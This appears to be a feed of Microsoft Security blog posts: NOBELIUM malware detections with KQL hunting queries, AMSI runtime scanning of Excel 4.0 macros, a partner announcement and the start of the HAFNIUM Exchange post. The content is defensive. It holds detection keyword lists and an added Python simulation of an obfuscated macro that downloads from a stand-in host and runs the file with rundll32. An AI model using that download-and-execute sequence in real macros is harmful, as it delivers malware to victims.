GoldFinder was compiled using Go 1.14.2, released in April 2020, from a Go file named finder.go with the following path: /tmp/finder.go. The Go packages and libraries used during the compilation process of GoldFinder were mostly located under the /var/www/html/go/src/ directory (e.g., /var/www/html/go/src/net/http/http.go).

Comprehensive protections for persistent techniques

The sophisticated NOBELIUM attack requires a comprehensive incident response to identify, investigate, and respond. Get the latest information and guidance from Microsoft at

Microsoft Defender Antivirus detects the new NOBELIUM components discussed in this blog as the following malware:

  • Trojan:Win64/GoldMax.A!dha
  • TrojanDownloader:VBS/Sibot.A!dha
  • Trojan:VBS/Sibot.B!dha
  • Trojan:Win64/GoldFinder.A!dha
  • Behavior:Win32/Sibot.C

Turning on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus ensures that artificial intelligence and machine learning can quickly identify and stop new and unknown threats. Tamper protection features prevent attackers from stopping security services. Attack surface reduction rules, specifically the rule “Block executable files from running unless they meet a prevalence, age, or trusted list criterion”, can help block new malware and attacker tools introduced by threat actors.


Figure 13. Security recommendations in threat and vulnerability management

Detections of new malware by Microsoft Defender Antivirus are reported as alerts in Microsoft Defender Security Center. Additionally, endpoint detection and response capabilities in Microsoft Defender for Endpoint detect malicious behavior related to these NOBELIUM components, which are surfaced as alerts with the following titles:

  • GoldMax malware
  • Sibot malware
  • GoldFinder Malware

The following alerts, which indicate detection of behavior associated with a wide range of attacks, are also raised for these NOBELIUM components:

  • Suspicious connection to remote service
  • Suspicious Rundll32 Process Execution
  • Suspicious PowerShell command line
  • Suspicious file or script accessed a malicious registry key

Intelligence about these newly surfaced components accrues to the information about NOBELIUM that Microsoft 365 Defender consolidates. Rich investigation tools in Microsoft 365 Defender allow security operations teams to comprehensively respond to this attack. Get comprehensive guidance for using Microsoft 365 Defender to identify, investigate, and respond to the NOBELIUM attack.




Indicators of compromise (IOCs)

Due to the nature of this attack, most samples are unique to each network they were discovered in; however, Microsoft has confirmed that these samples available in public repositories are associated with this threat.

GoldMax C2 decoy traffic

As detailed above, GoldMax employs decoy traffic to blend in with normal network traffic. Below are several examples demonstrating the patterns GoldMax uses to mix legitimate traffic with C2 queries:

Advanced hunting queries

Rundll32.exe .sys image loads by reference

Looks for rundll32.exe loading a .sys file explicitly by name.

Run query in Microsoft 365 security center:

// Source table was not preserved in this copy; DeviceImageLoadEvents is inferred from the columns used
DeviceImageLoadEvents
| where InitiatingProcessFileName =~ 'rundll32.exe'
| where InitiatingProcessCommandLine has_any('.sys,','.sys ')
| where FileName endswith '.sys'
| project Timestamp, DeviceId, InitiatingProcessParentFileName, InitiatingProcessFolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine, FolderPath, FileName

Rundll32.exe executing inline VBScript

Looks for rundll32.exe executing specific inline VBScript commands.

Run query in Microsoft 365 security center:

// Source table was not preserved in this copy; DeviceProcessEvents is inferred from the columns used
DeviceProcessEvents
| where FileName =~ 'rundll32.exe'
| where ProcessCommandLine has 'Execute'
and ProcessCommandLine has 'RegRead'
and ProcessCommandLine has 'window.close'
| project Timestamp, DeviceId, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine

Run query in Azure Sentinel (GitHub link):

// Source table was not preserved in this copy; SecurityEvent is inferred from the EventID 4688 filter and columns used
SecurityEvent
| where EventID == 4688
| where Process =~ 'rundll32.exe'
| where CommandLine has_all ('Execute','RegRead','window.close')
| project TimeGenerated, Computer, Account, Process, NewProcessName, CommandLine, ParentProcessName, _ResourceId

VBScript payload stored in registry

Looks for VBScript payload stored in registry, specifically stored within a sub-key of CurrentVersion registry path and excluding common AutoRun persistence locations like Run and RunOnce registry keys.

Run query in Microsoft 365 security center:

// Source table was not preserved in this copy; DeviceRegistryEvents is inferred from the columns used
DeviceRegistryEvents
| where RegistryKey endswith @'\Microsoft\Windows\CurrentVersion'
| where RegistryValueType == 'String'
| where strlen(RegistryValueData) >= 200
| where RegistryValueData has_any('vbscript','jscript','mshtml,','mshtml ','RunHTMLApplication','Execute(','CreateObject','RegRead','window.close')
| where RegistryKey !endswith @'\Software\Microsoft\Windows\CurrentVersion\Run'
and RegistryKey !endswith @'\Software\Microsoft\Windows\CurrentVersion\RunOnce'
| project Timestamp, DeviceId, InitiatingProcessFileName, InitiatingProcessCommandLine, RegistryKey, RegistryValueName, RegistryValueData

Run query in Azure Sentinel (GitHub link):

let cmdTokens0 = dynamic(['vbscript','jscript']);
let cmdTokens1 = dynamic(['mshtml','RunHTMLApplication']);
let cmdTokens2 = dynamic(['Execute','CreateObject','RegRead','window.close']);
// Source table was not preserved in this copy; SecurityEvent is inferred from the EventID 4688 filter and columns used
SecurityEvent
| where TimeGenerated >= ago(14d)
| where EventID == 4688
| where CommandLine has @'\Microsoft\Windows\CurrentVersion'
| where not(CommandLine has_any (@'\Software\Microsoft\Windows\CurrentVersion\Run', @'\Software\Microsoft\Windows\CurrentVersion\RunOnce'))
// If you are receiving false positives, then it may help to make the query more strict by uncommenting the lines below to refine the matches
//| where CommandLine has_any (cmdTokens0)
//| where CommandLine has_all (cmdTokens1)
| where CommandLine has_all (cmdTokens2)
| project TimeGenerated, Computer, Account, Process, NewProcessName, CommandLine, ParentProcessName, _ResourceId

Domain IOC lookup

Looks for identified C2 domains.

Run query in Azure Sentinel (GitHub link):

// The indicator lists below are empty placeholders in this copy; populate them with the identified C2 domains and IP address
let DomainNames = dynamic(['', '', '']);
let IPList = dynamic(['']);
let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}';
// The source table and parentheses of each union branch were not preserved in this copy; they are inferred from the columns each branch uses
(union isfuzzy=true
(CommonSecurityLog
| where SourceIP in (IPList) or DestinationIP in (IPList) or DestinationHostName in~ (DomainNames) or RequestURL has_any (DomainNames) or Message has_any (IPList)
| parse Message with * '(' DNSName ')' *
| extend MessageIP = extract(IPRegex, 0, Message)
| extend IPMatch = case(SourceIP in (IPList), "SourceIP", DestinationIP in (IPList), "DestinationIP", MessageIP in (IPList), "Message", RequestURL in (DomainNames), "RequestUrl", "NoMatch")
| extend timestamp = TimeGenerated, IPCustomEntity = case(IPMatch == "SourceIP", SourceIP, IPMatch == "DestinationIP", DestinationIP, IPMatch == "Message", MessageIP, "NoMatch"), AccountCustomEntity = SourceUserID
),
(DnsEvents
| where IPAddresses in (IPList) or Name in~ (DomainNames)
| extend DestinationIPAddress = IPAddresses, DNSName = Name, Host = Computer
| extend timestamp = TimeGenerated, IPCustomEntity = DestinationIPAddress, HostCustomEntity = Host
),
(VMConnection
| where SourceIp in (IPList) or DestinationIp in (IPList) or RemoteDnsCanonicalNames has_any (DomainNames)
| parse RemoteDnsCanonicalNames with * '["' DNSName '"]' *
| extend IPMatch = case( SourceIp in (IPList), "SourceIP", DestinationIp in (IPList), "DestinationIP", "None")
| extend timestamp = TimeGenerated, IPCustomEntity = case(IPMatch == "SourceIP", SourceIp, IPMatch == "DestinationIP", DestinationIp, "NoMatch"), HostCustomEntity = Computer
),
(OfficeActivity
| where ClientIP in (IPList)
| extend timestamp = TimeGenerated, IPCustomEntity = ClientIP, AccountCustomEntity = UserId
),
(DeviceNetworkEvents
| where RemoteUrl has_any (DomainNames) or RemoteIP in (IPList)
| extend timestamp = TimeGenerated, DNSName = RemoteUrl, IPCustomEntity = RemoteIP, HostCustomEntity = DeviceName
),
(AzureDiagnostics
| where ResourceType == "AZUREFIREWALLS"
| where Category == "AzureFirewallDnsProxy"
| parse msg_s with "DNS Request: " ClientIP ":" ClientPort " - " QueryID " " Request_Type " " Request_Class " " Request_Name ". " Request_Protocol " " Request_Size " " EDNSO_DO " " EDNS0_Buffersize " " Responce_Code " " Responce_Flags " " Responce_Size " " Response_Duration
| where Request_Name has_any (DomainNames)
| extend timestamp = TimeGenerated, DNSName = Request_Name, IPCustomEntity = ClientIP
),
(AzureDiagnostics
| where ResourceType == "AZUREFIREWALLS"
| where Category == "AzureFirewallApplicationRule"
| parse msg_s with Protocol 'request from ' SourceHost ':' SourcePort 'to ' DestinationHost ':' DestinationPort '. Action:' Action
| where isnotempty(DestinationHost)
| where DestinationHost has_any (DomainNames)
| extend timestamp = TimeGenerated, DNSName = DestinationHost, IPCustomEntity = SourceHost
)
)

The post GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence appeared first on Microsoft Security.

XLM + AMSI: New runtime defense against Excel 4.0 macro malware

Microsoft Malware Protection Center - Wed, 03/03/2021 - 12:00pm

We have recently expanded the integration of Antimalware Scan Interface (AMSI) with Office 365 to include the runtime scanning of Excel 4.0 (XLM) macros, to help antivirus solutions tackle the increase in attacks that use malicious XLM macros. This integration, an example of the many security features released for Microsoft 365 Apps on a regular basis, reflects our commitment to continuously increase protection for Microsoft 365 customers against the latest threats.

Microsoft Defender Antivirus is using this integration to detect and block XLM-based malware, and we encourage other antivirus products to use this open interface to gain better visibility and improve protections against these threats.

XLM is a legacy macro language that was made available in Microsoft Excel in 1992, prior to the introduction of Visual Basic for Applications (VBA) in 1993. While more rudimentary than VBA, XLM is powerful enough to provide interoperability with the operating system, and many organizations and users continue to use its functionality for legitimate purposes. Cybercriminals know this, and they have been abusing XLM macros with increasing frequency to call Win32 APIs and run shell commands.

The AMSI instrumentation for VBA has been providing deep visibility into the runtime behavior of VBA macros. Its release in 2018 effectively removed the armor that macro-obfuscation equipped malware with, exposing malicious code to improved levels of scrutiny. Naturally, threat actors like those behind Trickbot, Zloader, and Ursnif have looked elsewhere for features to abuse and operate under the radar of security solutions, and they found a suitable alternative in XLM.

Like VBA and many other scripting languages abused by malware, XLM code can be obfuscated relatively easily to conceal the real intent of the macro. For example, attackers can hide URLs or file names of executable files from static inspection through simple string manipulations. Attackers also take advantage of the way macro code persists within the Excel document—while VBA macros are stored in a dedicated OLE stream (and hence can be easily located and extracted), XLM macros do not exist as a separate, well-defined entity. Rather, each XLM macro statement is a formula within a cell. Extracting a whole XLM macro can become a cumbersome task, requiring a cell-by-cell inspection of the whole document.

Figure 1. Sample malicious XLM macro

In addition, while formulas are typically executed downwards starting from the top, with XLM the macro content can be quite spread out, thanks to control flow statements like RUN, CALL, or GOTO, which allow the switching of execution flow from one column to another. This feature, together with obfuscation, has been abused by attackers to craft documents that could evade static analysis.

AMSI instrumentation for Excel 4.0 (XLM) macros

AMSI is an open interface that allows any application to request the scanning of any data at any time. In a nutshell, this technology provides applications the capability to interface with the installed antivirus solution in order to inspect and scan potentially dangerous data (e.g., a file downloaded from a remote location, or data generated dynamically by an application). Microsoft already utilizes this technology in various applications to detect malicious macros, script-based malware, and other threats:

  • Office VBA macros
  • JScript
  • VBScript
  • PowerShell
  • WMI
  • Dynamically loaded .NET assemblies
  • MSHTA/Jscript9

The data provided by AMSI is leveraged extensively by Microsoft Defender for Endpoint. It provides important data for machine learning models that process billions of signals every day to identify and block malicious behaviors. The XLM instrumentation is similar to the implementation in VBA and other scripting engines that integrate with AMSI:

Figure 2. AMSI instrumentation for XLM

The XLM language allows a user to write programs that call native runtime functions, as well as external Win32 APIs. In both cases, the interfaces that dispatch the calls to these functions are intercepted and directed to an internal logger. The logger component stores the intercepted functions in text format within a circular buffer. When certain dangerous functions are called, for example the runtime function EXEC or the Win32 API ShellExecute, XLM halts the macro execution and invokes AMSI to request a synchronous scan of the circular buffer containing the functions logged up to that point. Such dangerous functions are called “trigger functions”. If the antivirus identifies the macro as malware, the execution of the macro is aborted and Excel is safely terminated, blocking the attack and preventing the malicious macro from doing any damage. Otherwise, the user experience continues seamlessly.

It’s important to observe that the interception of XLM function calls happens at runtime. This means that the logger component always registers the true behavior of all functions and associated parameters, which may contain URLs, file names, and other important IOCs, regardless of the obfuscation used by the malware.

The following is an example of an XLM macro found in a malicious document:

Figure 3. Sample XLM macro

This malicious macro consists of a series of commands (e.g., RUN, REGISTER, IF, etc.) with related parameters specified by references to other cells. For example, the token $CA$1889 passed to the first function RUN indicates that the string provided as parameter for this function is in the cell at column CA and row 1889.

This is only one of the many ways that XLM-based malware can obfuscate code. Detecting this macro is challenging because it doesn’t expose any suspicious strings or behavior. This is where the power of AMSI comes into play: the instrumentation allows XLM to inspect functions when they are invoked, so that all their parameters have already been de-obfuscated. As a result, the above macro produces a log that looks like the following:

Figure 4. Sample log

The XLM engine determines that the dangerous function ShellExecuteA is being invoked, and subsequently places the macro execution on hold and passes the macro behavioral log to AMSI for scanning. The antivirus now has visibility into a behavioral log that completely exposes all of the data, including API names, URLs, and file names. The log makes it easy to conclude that this macro is trying to download and execute a DLL payload via the tool Rundll32.
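The following is an added example, not Microsoft's code, that models the mechanism described above (logger, circular buffer, trigger functions) and the cell-reference obfuscation of the $CA$1889 example: a toy XLM runtime resolves cell references only at call time, logs calls made through REGISTER aliases under the true Win32 API name, and hands the buffer to a stand-in scanner when a trigger function is reached. The cell layout, buffer size, trigger set and scanner rule are all constructed for illustration.

```python
"""Toy model of the XLM runtime instrumentation described above (added example)."""
import re
from collections import deque

CELL_REF = re.compile(r"\$[A-Z]{1,3}\$\d+")
TRIGGER_FUNCTIONS = {"EXEC", "ShellExecuteA"}   # constructed subset of trigger functions
DEFAULT_BUFFER_SIZE = 8                           # constructed circular-buffer capacity


class MacroBlocked(Exception):
    """Raised when the scanner flags the behavioural log as malicious."""


class XlmRuntime:
    def __init__(self, cells, scanner, buffer_size=DEFAULT_BUFFER_SIZE):
        self.cells = cells                      # {"$CA$1889": "...", ...}
        self.scanner = scanner                  # stand-in for the AMSI provider
        self.registered = {}                    # alias -> (dll, api) from REGISTER
        self.log = deque(maxlen=buffer_size)    # circular behavioural log
        self.scan_requests = []                 # snapshots handed to the scanner

    def resolve(self, token, depth=0):
        """Turn a cell reference (or an =ref&ref concatenation) into its string."""
        if depth > 32:
            raise ValueError("reference chain too deep")
        if not CELL_REF.fullmatch(token):
            return token                        # literal argument
        value = self.cells.get(token, "")
        if value.startswith("="):               # formula: concatenate its parts
            return "".join(self.resolve(p.strip(), depth + 1) for p in value[1:].split("&"))
        return value

    def call(self, name, args):
        resolved = [self.resolve(a) for a in args]   # de-obfuscated at call time
        if name == "REGISTER":                       # REGISTER(dll, api, signature, alias, ...)
            dll, api, alias = resolved[0], resolved[1], resolved[3]
            self.registered[alias] = (dll, api)
            self.log.append(f"REGISTER({dll!r}, {api!r}, alias={alias!r})")
            return
        # Log the real API name, not the alias the macro author chose.
        effective = self.registered[name][1] if name in self.registered else name
        entry = f"{effective}({', '.join(repr(a) for a in resolved)})"
        self.log.append(entry)
        if effective in TRIGGER_FUNCTIONS:           # pause and request a synchronous scan
            snapshot = list(self.log)
            self.scan_requests.append(snapshot)
            if self.scanner(snapshot):
                raise MacroBlocked(entry)


def sample_scanner(log_lines):
    """Stand-in for the antivirus: flag download-then-execute through rundll32."""
    text = "\n".join(log_lines)
    downloaded = "URLDownloadToFileA(" in text
    executed = re.search(r"ShellExecuteA\(.*rundll32", text, re.IGNORECASE) is not None
    return downloaded and executed


def run_macro(cells, statements, scanner=sample_scanner, buffer_size=DEFAULT_BUFFER_SIZE):
    """Execute statements in order; return (verdict, log snapshot, number of scans)."""
    rt = XlmRuntime(cells, scanner, buffer_size)
    try:
        for func, args in statements:
            rt.call(func, args)
    except MacroBlocked:
        return "blocked", list(rt.log), len(rt.scan_requests)
    return "allowed", list(rt.log), len(rt.scan_requests)


# Constructed sheet: API names and the URL are split across cells so that no single
# cell holds a usable string, mimicking the $CA$1889 reference style of Figure 3.
SAMPLE_CELLS = {
    "$CA$1889": "=$CB$1&$CB$2", "$CB$1": "URLDownload", "$CB$2": "ToFileA",
    "$CA$1890": "=$CB$3&$CB$4", "$CB$3": "http://example.invalid/", "$CB$4": "jxi09.txt",
    "$CA$1891": "C:\\Users\\Public\\jxi09.txt",
    "$CA$1892": "rundll32.exe",
    "$CA$1893": "=$CA$1891&$CB$5", "$CB$5": ",DllRegisterServer",
}
SAMPLE_MACRO = [
    ("REGISTER", ["urlmon", "$CA$1889", "JJCCBB", "download", "", "1", "9"]),
    ("download", ["0", "$CA$1890", "$CA$1891", "0", "0"]),
    ("REGISTER", ["shell32", "ShellExecuteA", "JJCCCCJ", "shellex", "", "1", "9"]),
    ("shellex", ["0", "open", "$CA$1892", "$CA$1893", "0", "5"]),
]
BENIGN_MACRO = [("ALERT", ["Report generated"]), ("EXEC", ["notepad.exe"])]

if __name__ == "__main__":
    verdict, log, scans = run_macro(SAMPLE_CELLS, SAMPLE_MACRO)
    print(verdict, f"after {scans} scan(s):")
    print("\n".join(log))
```

Running it with a two-entry buffer shows why the buffer size matters: the download call has already been evicted by the time ShellExecuteA triggers the scan, so the scanner no longer sees the full download-then-execute sequence.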

Case study: ZLoader campaign

ZLoader is a malware family that has been actively perpetrating financial theft for several years. Like many of its peers, ZLoader operates via aggressive campaigns that rely on social engineering and the abuse of Office documents spread via email.

We have been monitoring the activity of this threat and observed that in the last year the attackers shifted to XLM as their infection vector of choice. The Excel documents have a typical lure message to trick the user into clicking “Enable Content” to allow the macro code to run.

Figure 5. Malicious Excel file used in Zloader campaign

A closer look at the document reveals an Excel sheet with an obscure-looking name. That sheet embeds XLM macro formulas, which are stored several rows down to make the sheet look empty. Furthermore, the macro formulas are spread out and obfuscated, hindering static analysis and raising more challenges for identifying intent.

Figure 6. Malicious XLM macro used in ZLoader campaign

Executing and debugging the macro with Excel is not very straightforward either. The macro has long loops that are used to decode and run further obfuscated macro formulas, and the Excel’s debugger doesn’t have the ability to control the execution in a granular way in order to skip loops and break on specific formulas.

However, when this macro runs with the AMSI instrumentation enabled, it produces up to three different logs that are passed to AMSI. The first two look like the following:

Figure 7. Log produced when ZLoader’s XLM macro is run

The image only shows the final part of the log where the interesting activity shows up. We can see that the macro is issuing a new EXEC statement to run a .vbs file via explorer.exe. This EXEC statement causes the execution of the VBScript named EW2H.vbs, which has been decoded and saved to disk by the macro prior to the EXEC line. The VBScript then tries to download and run a binary payload. The macro attempts to do this twice, hence this log (with minor variations) is passed to AMSI twice.

If the above steps fail, the macro resorts to downloading the payload directly, producing the following log for AMSI:

Figure 8. Log produced when ZLoader’s XLM macro is run

The macro defines two URLs, then downloads their content with the API URLDownloadToFileA, and finally invokes the API ShellExecuteA to launch the downloaded payload (the file jxi09.txt) via rundll32.exe. We can infer from this line that the payload is a DLL.

All three logs offer plenty of opportunities to detect malicious behavior and also allow the easy extraction of relevant IOCs like URLs, file names, etc. The initial XLM code in the Excel document is completely obfuscated and contains no usable information, making it tricky to issue static detections that are both effective and durable. With the dynamic nature of AMSI, the runtime behavior can be observed in cleartext, even with obfuscation. Detections based on the logs passed to AMSI also have the advantage of being more robust and generic in nature.


Runtime inspection of XLM macros is now available in Microsoft Excel and can be used by antivirus solutions like Microsoft Defender Antivirus that are registered as an AMSI provider on the device. This feature is included as an addition to the existing AMSI integration with Office. It’s enabled by default on the February Current Channel and Monthly Enterprise Channel for Microsoft 365 subscription users.

In its default configuration, XLM macros are scanned at runtime via AMSI, except in the following scenarios:

Administrators can now use the existing Microsoft 365 applications policy control to configure when both XLM and VBA macros are scanned at runtime via AMSI. Get the latest group policy template files.


Group Policy setting name: Macro Runtime Scan Scope

Path: User Configuration > Administrative templates > Microsoft Office 2016 > Security Settings

This policy setting specifies the behavior for both the VBA and Excel 4.0 (XLM) runtime scan features. Multiple Office apps support VBA macros, but XLM macros are only supported by Excel. Macros can only be scanned if the antivirus software registers as an Antimalware Scan Interface (AMSI) provider on the device.

If you enable this policy setting, you can choose from the following options to determine the macro runtime scanning behavior:

Disable for all files (not recommended): If you choose this option, no runtime scanning of enabled macros will be performed.

Enable for low trust files: If you choose this option, runtime scanning will be enabled for all files for which macros are enabled, except for the following files:

  • Files opened while macro security settings are set to “Enable all macros”
  • Files opened from a trusted location
  • Files that are Trusted Documents
  • Files that contain VBA that is digitally signed by a trusted publisher

Enable for all files: If you choose this option, then low trust files are not excluded from runtime scanning. The VBA and XLM runtimes report to an antivirus system certain high-risk code behaviors the macro is about to execute. This allows the antivirus system to indicate whether or not the macro behavior is malicious. If the behavior is determined to be malicious, the Office application closes the session and the antivirus system can quarantine the file. If the behavior is non-malicious, the macro execution proceeds.

Note: When macro runtime scanning is enabled, the runtime performance of affected VBA projects and XLM sheets may be reduced.

If you disable this policy setting, no runtime scanning of enabled macros will be performed.

If you don’t configure this policy setting, “Enable for low trust files” will be the default setting.

Note: This policy setting only applies to subscription versions of Office, such as Microsoft 365 Apps for enterprise.

AMSI improves security for all

AMSI provides deep and dynamic visibility into the runtime behaviors of macros and other scripts to expose threats that hide malicious intent behind obfuscation, junk control flow statements, and many other tricks. Microsoft Defender Antivirus, the built-in antivirus solution on Windows 10, has been leveraging AMSI to uncover a wide range of threats, from common malware to sophisticated attacks. The recent AMSI instrumentation in XLM directly tackles the rise of malware campaigns that abuse this feature. Because AMSI is an open interface, other antivirus solutions can leverage the same visibility to improve protections against threats. Security vendors can learn how to leverage AMSI in their antivirus products here.

At Microsoft, we take full advantage of signals from AMSI. The data generated by AMSI is not only useful for immediate client antimalware detections, but also provides rich signals for Microsoft Defender for Endpoint. In our blog post about AMSI for VBA, we described how these signals are ingested by multiple layers of cloud-based machine learning classifiers and are combined with all other signals. The result is an enhanced protection layer that learns to recognize and block new and unknown threats in real-time.

Figure 9. Example of detection from Microsoft Defender Antivirus based on data inspected by AMSI

Figure 10: Notification from Microsoft Excel after AMSI reported malware detection

Figure 11: Example of Microsoft Defender for Endpoint alert for detection of XLM malware

The visibility provided by AMSI leads to significant improvements in generic and resilient signatures that can stop waves of obfuscated and mutated variants of threats. AMSI-driven protection adds to an extensive multi-layer protection stack in Microsoft Defender for Endpoint, which also includes attack surface reduction, network protection, behavior monitoring and other technologies that protect against macro malware and other similar script-based threats.

The AMSI-enriched visibility provided by Microsoft Defender for Endpoint is further amplified across Microsoft 365 Defender, such that XLM macro threats are detected and blocked on various entry vectors. The orchestration of signal-sharing and coordinated defense in Microsoft 365 ensures that, for example, Microsoft Defender for Office 365 blocks macro malware distributed via email, which is the most common delivery method for these threats.

Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.


Giulia Biagini, Office 365 Threat Research Team

Auston Wallace, Microsoft 365 Security Team

Andrea Lelli, Microsoft 365 Defender Research Team

The post XLM + AMSI: New runtime defense against Excel 4.0 macro malware appeared first on Microsoft Security.

Compliance joins Microsoft Intelligent Security Association (MISA)

Microsoft Malware Protection Center - Wed, 03/03/2021 - 9:00am

Like many of you, I’m thrilled to have my 2020 calendar safely in the recycling pile. During that time though, you too might have noticed how, perhaps unknowingly, you were able to turn some of last year’s lemons into lemonade. Maybe you developed a deeper appreciation for everyday moments and the people in your life, gaining a new perspective on what matters most.

For my team, seeing the Microsoft Intelligent Security Association (MISA) grow to 190 partner companies has been a bright spot in a dark year. To date, MISA members have created 215 product integrations, and I’m pleased to announce that our pilot program for adding managed security service providers (MSSPs) has formally transitioned. MISA now includes 39 MSSP members who have created 76 MSSP offers since the beginning of the fiscal year.

“Microsoft Security integrates with a broad ecosystem of platforms and cloud providers, so they work with the things you already have in your environment; whether those things are from Microsoft, or not. Our partners are key to helping facilitate this integration.”
Vasu Jakkal, CVP, Security, Compliance and Identity

“Adding managed security service providers promises to increase the ecosystem’s value even more by offering an extra layer of threat protection—reducing the day-to-day involvement of in-house security teams. It’s another important step in strengthening and simplifying security at a time when risk mitigation is one of IT’s highest priorities.”
Shawn O’Grady, Senior Vice President and General Manager, Cloud + Data Center Transformation at Insight

Because Microsoft’s footprint extends across many technologies, we have an advantage in creating holistic solutions that encompass the full breadth of security, compliance, and identity. In keeping with that end-to-end approach, we’ve expanded MISA to include 5 new compliance products, growing the MISA product portfolio to 18.

“The explosion of data from digital transformation and remote work make the integration of security and compliance tools across internal and external ecosystems more critical than ever. Together with the deep expertise of our MISA members, we can help our customers address their complex, evolving security and compliance needs.”
Alym Rayani, General Manager, Microsoft Compliance

Compliance comes to MISA

Microsoft compliance products help our customers assess their compliance risk, protect their sensitive data, and govern it according to regulatory requirements. Through MISA, members get support in building managed services and integrations that:

  1. Protect and govern data wherever it lives.
  2. Identify and take actions on critical insider risks.
  3. Simplify compliance and reduce risk.
  4. Investigate and respond with relevant data.

“TeleMessage is excited to bring our Mobile Communication Archiving products to be a part of Microsoft’s security solutions. Being a MISA member allows us to work closely with the Microsoft teams and allows us to provide seamless, secure, and compliant integrations delivering all popular forms of mobile communication.”—Guy Levit, CEO at TeleMessage

Microsoft Information Protection has been part of MISA since the association began in 2018, providing broad coverage across devices, apps, cloud services, and on-premises systems. This year, we’re continuing to develop our holistic partner community across security, compliance, and identity by adding five additional Microsoft compliance products to our portfolio:

  • Microsoft Information Governance: Keep what you need and delete what you don’t. Apply compliance solutions and a deletion workflow for email, documents, instant messages, social media, document collaboration platforms, and more.
  • Microsoft Data Loss Prevention: Help users stay compliant without interrupting their workflow—prevent the accidental sharing of sensitive information across Exchange Online, SharePoint Online, OneDrive for Business, Microsoft Teams, and desktop versions of Excel, PowerPoint, and Microsoft Word.
  • Microsoft 365 Insider Risk Management: Identify critical insider risks and take the appropriate action. With built-in privacy controls, use native and third-party signals to identify, investigate, and remediate malicious and inadvertent activities in your organization.
  • Microsoft Advanced eDiscovery: Gain an end-to-end workflow to collect, analyze, preserve, and export content that’s responsive to your organization’s internal and external investigations. Identify persons of interest and their data sources, then manage the legal-hold communication process.
  • Microsoft Compliance Manager: Get help throughout your compliance journey, from taking inventory of your data protection risks to managing the complexities of implementing controls, staying current with regulations and certifications, and reporting to auditors.

“Joining MISA enhances our relationship with Microsoft and our commitment to being an information governance and compliance leader providing solutions for organizations to bring third-party data into Microsoft 365 archive,” said Charles Weeden, Managing Partner of 17a-4, LLC. “DataParser’s connectors will allow Microsoft 365 Compliance users to ingest content from various sources, such as Bloomberg, Slack, Symphony, Webex Teams and many others.”

Connectors and APIs to extend compliance capabilities

Organizations today face an intimidating amount of data to protect across disparate systems, both on-premises and in the cloud. That’s why Microsoft compliance solutions span information protection and governance, data-loss prevention, insider risk, eDiscovery, audit, and compliance management—including your non-Microsoft data.

Microsoft 365 compliance enables organizations to extend, integrate, accelerate, and support their compliance solutions with three key building blocks:

All of these new capabilities exist within Microsoft’s integrated compliance platform. Meaning, customers only need to set compliance policies a single time, regardless of the data source.

“The Veritas Merge1 connector platform integration with M365 allows our joint customers to configure, connect, and capture a vast number of data sources from within the M365 compliance center. The integration makes it easy to quickly identify which data sources need to be captured, to configure connectivity to those data sources and to pull data into M365 all from within the Azure infrastructure. Our development teams have worked closely together for over 12 months to make sure the workflow is simple and the capabilities are robust. With the increase in global regulations over the past several years, our goal is to simplify compliance, and we believe we have achieved that by working together with Microsoft.”
David Scott, Sr. Director, Digital Compliance at Veritas Technologies

Microsoft Security lights the way

As the global pandemic forced millions into remote work last year, hackers took advantage and upped their game, as seen with the recent Solorigate attack. Many organizations saw their sensitive data created, viewed, and distributed across multiple fragmented platforms, which increased the potential attack surface. Because we view security as part of the common good, we chose to take a proactive approach, shifting cybersecurity away from the shadows and into a place of innovation and empowerment.

“MISA has helped us promote successful integrations with Azure Security Graph API and Azure Active Directory, both now deeply embedded in Barracuda security solutions.”
Tim Jefferson, SVP Data, Networking, and Applications, Barracuda Networks

During Microsoft Ignite, March 2-4, 2021, you’ll see added investment in our security, compliance, and identity portfolio as we continue to innovate and create holistic solutions that support cultures of security for our customers and partners, based on four basic principles:

  • Protect everything: Safeguard your entire organization with integrated security, compliance, and identity solutions built to work across platforms and cloud environments.
  • Simplify the complex: Prioritize risks with unified management tools and strategic guidance created to maximize the human expertise inside your company.
  • Catch what others miss: Enable AI, automation, and human expertise to help you detect threats quickly, respond effectively, and fortify your security posture.
  • Grow your future: Gain the peace of mind that comes with a comprehensive security solution, empowering you to grow, create, and innovate across your business.

To learn more about upcoming big announcements at Microsoft Ignite this week, visit our latest blog posts:

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Compliance joins Microsoft Intelligent Security Association (MISA) appeared first on Microsoft Security.

HAFNIUM targeting Exchange Servers with 0-day exploits

Microsoft Malware Protection Center - Tue, 03/02/2021 - 4:07pm

Microsoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.

The vulnerabilities being exploited are CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which were addressed in today’s Microsoft Security Response Center (MSRC) release – Multiple Security Updates Released for Exchange Server. We strongly urge customers to update on-premises systems immediately. Exchange Online is not affected.

We are sharing this information with our customers and the security community to emphasize the critical nature of these vulnerabilities and the importance of patching all affected systems immediately to protect against these exploits and prevent future abuse across the ecosystem. This blog also continues our mission to shine a light on malicious actors and elevate awareness of the sophisticated tactics and techniques used to target our customers. The related IOCs, Azure Sentinel advanced hunting queries, and Microsoft Defender for Endpoint product detections and queries shared in this blog will help SOCs proactively hunt for related activity in their environments and elevate any alerts for remediation.

Microsoft would like to thank our industry colleagues at Volexity and Dubex for reporting different parts of the attack chain and their collaboration in the investigation. Volexity has also published a blog post with their analysis. It is this level of proactive communication and intelligence sharing that allows the community to come together to get ahead of attacks before they spread and improve security for all.


HAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.

